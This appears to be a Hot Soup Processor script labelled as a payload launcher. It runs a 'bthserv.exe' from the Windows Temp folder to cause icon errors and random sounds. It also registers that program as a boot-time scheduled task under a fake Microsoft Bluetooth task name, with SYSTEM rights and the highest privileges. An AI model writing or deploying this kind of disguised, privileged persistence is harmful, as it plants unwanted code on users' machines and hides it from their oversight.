*PAYLOAD_SUBPROCESS
	home_dir = dir_win + "\\Temp\\bthserv\\"
	chdir home_dir;
	button gosub "Bluetooth CPL", *bthprops
	button gosub "ICONERROR", *iconerror
	button gosub "RANDOMSOUND", *randomsound
	button gosub "sdram.app", *sdram
	button gosub "Make Task bthserv", *taskbthserv
	mes dir_win
	mes dir_exe
	stop

	
*bthprops
	exec "bthprops.cpl", 16
	return

*iconerror
	exec "bthserv.exe -ICONERROR", 0
	return

*randomsound
	exec "bthserv.exe -RANDOMSOUND", 0
	return

*sdram
	exec "bthserv.exe -tonorflash -dev bt15 -f sdram.app -updata -runaddr 0x1000000 -wait 300 -div6", 0		//Plays sdram.app
	return

*taskbthserv
	exec "schtasks.exe /create /sc ONSTART /tn Microsoft\\Windows\\Bluetooth\\bthserv /tr \"C:\\WINDOWS\\Temp\\bthserv\\bthserv.exe -RANDOMSOUND\" /ru system /f /rl HIGHEST", 0;
	exec "schtasks.exe /run Microsoft\\Windows\\Bluetooth\\bthserv", 0